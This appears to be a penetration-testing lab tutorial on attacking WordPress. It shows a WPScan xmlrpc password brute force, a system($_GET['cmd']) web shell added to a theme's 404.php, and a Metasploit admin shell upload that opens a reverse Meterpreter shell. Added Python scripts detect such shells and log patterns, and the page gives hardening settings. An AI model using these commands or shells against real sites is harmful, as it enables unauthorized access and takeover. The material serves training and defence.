Attacking WordPress Users

WordPress User Bruteforce

WPScan can be used to brute force usernames and passwords. The scan report returned three users registered on the website: admin, roger, and david. The tool uses two kinds of login brute force attacks, xmlrpc and wp-login. The wp-login method will attempt to brute force the normal WordPress login page, while the xmlrpc method uses the WordPress API to make login attempts through /xmlrpc.php. The xmlrpc method is preferred as it is faster.
WPScan - XMLRPC
Dudji@htb[/htb]$ wpscan --password-attack xmlrpc -t 20 -U admin,david -P passwords.txt --url http://blog.inlanefreight.com

[+] URL: http://blog.inlanefreight.com/
[+] Started: Thu Apr  9 13:37:36 2020
[+] Performing password attack on Xmlrpc against 3 user/s

[SUCCESS] - admin / sunshine1
Trying david / Spring2016 Time: 00:00:01 <============> (474 / 474) 100.00% Time: 00:00:01

[i] Valid Combinations Found:
 | Username: admin, Password: sunshine1

Remote Code Execution (RCE) via the Theme Editor

Attacking the WordPress Backend

With administrative access to WordPress, we can modify the PHP source code to execute system commands. To perform this attack, log in to WordPress with administrator credentials, which should redirect us to the admin panel. Click on Appearance in the side panel and select Theme Editor. This page allows us to edit PHP source code directly. Select an inactive theme to avoid corrupting the main theme.

[Image: WordPress Theme Editor view]

In this example, the active theme is Transportex, so an unused theme such as Twenty Seventeen should be selected instead.

[Image: Selecting an inactive WordPress theme]

Choose the inactive theme and click Select. Next, choose a non-critical file such as 404.php, then add a web shell.
Twenty Seventeen Theme - 404.php
<?php

system($_GET['cmd']);

/**
 * The template for displaying 404 pages (not found)
 *
 * @link https://codex.wordpress.org/Creating_an_Error_404_Page
<SNIP>
The code above executes operating system commands through the GET parameter cmd. In this example, we modified 404.php and introduced the system() function. Command execution can then be triggered by appending the cmd parameter to the URL, for example: 404.php?cmd=id. We can validate code execution by browsing to that URL directly or by issuing the following cURL request.
RCE
Dudji@htb[/htb]$ curl -X GET "http://<target>/wp-content/themes/twentyseventeen/404.php?cmd=id"

uid=1000(wp-user) gid=1000(wp-user) groups=1000(wp-user)
<SNIP>
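From the defender's side, the modification above leaves two traces on disk: the theme file's hash no longer matches a known-good baseline, and the file now contains a shell-execution function fed directly from a request superglobal. The script below is an added example (not HTB's, WordPress's or any plugin's code) that checks for both. It assumes a baseline of SHA-256 hashes was recorded while the theme tree was clean; the miniature theme directory, the clean and tampered 404.php contents and the helper names (scan_php_source, build_baseline, scan_tree, demo) are all constructed for the example.

```python
"""Detect theme/plugin PHP files that were tampered with to add a web shell.
Added example for this page (not HTB's or WordPress's own code): combines a
SHA-256 baseline comparison with a search for shell-execution sinks whose
argument comes straight from a request superglobal, as in system($_GET['cmd'])."""
import hashlib
import re
import tempfile
from pathlib import Path

# PHP functions that hand a string to the operating system shell.
EXEC_SINKS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open")

# Matches e.g.  system($_GET['cmd']);  or  exec("x " . $_REQUEST["c"]);
SINK_PATTERN = re.compile(
    r"\b(" + "|".join(EXEC_SINKS) + r")\s*\(\s*[^;]*?\$_(GET|POST|REQUEST|COOKIE)\b",
    re.IGNORECASE,
)
# PHP backticks are also shell execution: `ls $_GET['d']`
BACKTICK_PATTERN = re.compile(r"`[^`\n]*\$_(GET|POST|REQUEST|COOKIE)[^`\n]*`")


def scan_php_source(source):
    """Return [(line_number, stripped_line)] for each suspicious line."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        if SINK_PATTERN.search(line) or BACKTICK_PATTERN.search(line):
            findings.append((lineno, line.strip()))
    return findings


def file_sha256(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()


def build_baseline(root):
    """Hash every PHP file under root while the tree is known-good."""
    return {p.relative_to(root).as_posix(): file_sha256(p)
            for p in root.rglob("*.php")}


def scan_tree(root, baseline=None):
    """Report PHP files whose hash changed (or is new) since the baseline,
    and files containing a request-controlled shell sink."""
    report = {"modified": [], "sinks": {}}
    for php in sorted(root.rglob("*.php")):
        rel = php.relative_to(root).as_posix()
        if baseline is not None and baseline.get(rel) != file_sha256(php):
            report["modified"].append(rel)
        hits = scan_php_source(php.read_text(errors="replace"))
        if hits:
            report["sinks"][rel] = hits
    return report


# --- Constructed demonstration data (not real theme files) -----------------
CLEAN_404 = """<?php
/**
 * The template for displaying 404 pages (not found)
 */
get_header();
"""
# The same file after the theme-editor modification shown on this page.
TAMPERED_404 = "<?php\n\nsystem($_GET['cmd']);\n\n" + CLEAN_404[len("<?php\n"):]
CLEAN_INDEX = "<?php\nget_header();\nget_footer();\n"


def demo():
    """Build a miniature themes directory, baseline it, inject the shell, rescan."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "themes"
        theme = root / "twentyseventeen"
        theme.mkdir(parents=True)
        (theme / "404.php").write_text(CLEAN_404)
        (theme / "index.php").write_text(CLEAN_INDEX)
        baseline = build_baseline(root)
        (theme / "404.php").write_text(TAMPERED_404)  # simulate the attack
        return scan_tree(root, baseline)


if __name__ == "__main__":
    result = demo()
    for path in result["modified"]:
        print("modified since baseline:", path)
    for path, hits in result["sinks"].items():
        for lineno, text in hits:
            print(f"shell sink in {path}:{lineno}: {text}")
```

Point scan_tree at the real wp-content/themes or wp-content/plugins directory and feed it a baseline taken from a clean install to get the same report for a live site. The editor itself can be switched off by adding define('DISALLOW_FILE_EDIT', true); to wp-config.php, which removes the Theme Editor and Plugin Editor pages entirely; an administrator account that is compromised then has no in-browser route to edit PHP.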

Attacking WordPress with Metasploit

Automating WordPress Exploitation

We can use the Metasploit Framework (MSF) to obtain a reverse shell on the target automatically. This requires valid credentials for an account that has sufficient rights to create files on the webserver. To obtain the reverse shell, we can use the wp_admin_shell_upload module. We can easily search for it inside MSF:
MSF Search
msf5 > search wp_admin

Matching Modules
================

#  Name                                       Disclosure Date  Rank       Check  Description
-  ----                                       ---------------  ----       -----  -----------
0  exploit/unix/webapp/wp_admin_shell_upload  2015-02-21       excellent  Yes    WordPress Admin Shell Upload
The number 0 in the search results represents the ID for the suggested module. From here, we can specify the module by its ID number to save time.
Module Selection
msf5 > use 0

msf5 exploit(unix/webapp/wp_admin_shell_upload) >

Exploitation

After using the set command to configure the required options, use run to execute the module. If all parameters are correct, it should spawn a reverse shell on the target.
Set Options
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set rhosts blog.inlanefreight.com
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set username admin
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set password Winter2020
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set lhost 10.10.16.8
msf5 exploit(unix/webapp/wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 10.10.16.8:4444
[*] Authenticating with WordPress using admin:Winter2020...
[+] Authenticated with WordPress
[*] Uploading payload...
[*] Executing the payload at /wp-content/plugins/YtyZGFIhax/uTvAAKrAdp.php...
[*] Sending stage (38247 bytes) to blog.inlanefreight.com
[*] Meterpreter session 1 opened
[+] Deleted uTvAAKrAdp.php

meterpreter > getuid
Server username: www-data (33)
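Both attacks on this page leave a clear footprint in the web server's access log: the WPScan xmlrpc attack is a burst of POSTs to /xmlrpc.php from one source, and both the theme-editor shell and the Metasploit plugin upload end with a direct request to a PHP file under wp-content/themes or wp-content/plugins (the page's own examples are 404.php?cmd=id and /wp-content/plugins/YtyZGFIhax/uTvAAKrAdp.php). The script below is an added example, not part of the page, WPScan or Metasploit, that triages a log for those two patterns. It assumes the common log format, a 60-second window with a threshold of 20 xmlrpc POSTs (both arbitrary, to be tuned per site), and the sample lines are constructed, reusing only the paths and timestamps that appear on this page.

```python
"""Access-log triage for the two WordPress attack patterns shown on this page:
(1) password brute force through /xmlrpc.php, seen as a burst of POSTs from one
    source, and (2) execution of a dropped PHP file under wp-content/themes or
    wp-content/plugins (the theme-editor web shell and the Metasploit plugin
    upload both end with a direct request to such a file).
Added example, not part of the page or of WPScan/Metasploit; the log lines
below are constructed in the common log format."""
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
# A theme or plugin .php file requested directly, with or without a query string.
DIRECT_PHP_RE = re.compile(r"^/wp-content/(themes|plugins)/[^?]+\.php(\?|$)")


def parse_line(line):
    """Return a dict for a common-log-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"],
        "status": int(m["status"]),
    }


def find_xmlrpc_bursts(events, window_s=60, threshold=20):
    """Map source IP -> peak number of POSTs to /xmlrpc.php inside any
    sliding window of window_s seconds, for IPs exceeding threshold.
    window_s and threshold are assumptions; tune them to normal traffic."""
    by_ip = defaultdict(list)
    for e in events:
        if e["method"] == "POST" and e["path"].split("?", 1)[0] == "/xmlrpc.php":
            by_ip[e["ip"]].append(e["ts"])
    flagged = {}
    for ip, times in by_ip.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while (times[end] - times[start]).total_seconds() > window_s:
                start += 1
            count = end - start + 1
            if count > threshold:
                flagged[ip] = max(flagged.get(ip, 0), count)
    return flagged


def find_direct_php_hits(events):
    """(ip, path, status) for every direct request to a theme/plugin PHP file."""
    return [(e["ip"], e["path"], e["status"]) for e in events
            if DIRECT_PHP_RE.match(e["path"])]


def analyze(lines):
    events = [e for e in map(parse_line, lines) if e]
    return {"xmlrpc_bursts": find_xmlrpc_bursts(events),
            "direct_php": find_direct_php_hits(events)}


def constructed_sample_log():
    """Constructed log: normal browsing, 25 xmlrpc POSTs in about 3 s, then the
    two web-shell requests (paths taken from this page's output)."""
    lines = [
        '203.0.113.7 - - [09/Apr/2020:13:36:00 +0000] "GET / HTTP/1.1" 200 5120',
        '203.0.113.7 - - [09/Apr/2020:13:36:02 +0000] '
        '"GET /wp-content/themes/twentyseventeen/style.css HTTP/1.1" 200 910',
    ]
    for i in range(25):
        lines.append(f'10.10.16.8 - - [09/Apr/2020:13:37:{36 + i // 10:02d} +0000] '
                     '"POST /xmlrpc.php HTTP/1.1" 200 370')
    lines += [
        '10.10.16.8 - - [09/Apr/2020:13:45:10 +0000] '
        '"GET /wp-content/themes/twentyseventeen/404.php?cmd=id HTTP/1.1" 200 60',
        '10.10.16.8 - - [09/Apr/2020:13:52:41 +0000] '
        '"GET /wp-content/plugins/YtyZGFIhax/uTvAAKrAdp.php HTTP/1.1" 200 0',
    ]
    return lines


if __name__ == "__main__":
    result = analyze(constructed_sample_log())
    for ip, n in result["xmlrpc_bursts"].items():
        print(f"xmlrpc brute force suspected from {ip}: {n} POSTs in one window")
    for ip, path, status in result["direct_php"]:
        print(f"direct theme/plugin PHP request from {ip}: {path} -> {status}")
```

The direct-PHP list is a review queue rather than a verdict, since a few legitimate plugins serve PHP files directly; a 200 response to a freshly created path under wp-content/plugins, as in the Metasploit output above, is the case worth escalating. On the prevention side, define('DISALLOW_FILE_MODS', true); in wp-config.php blocks plugin and theme installation and updates from the dashboard, which removes the file-creation step the wp_admin_shell_upload module depends on, at the cost of having to deploy updates outside the web interface.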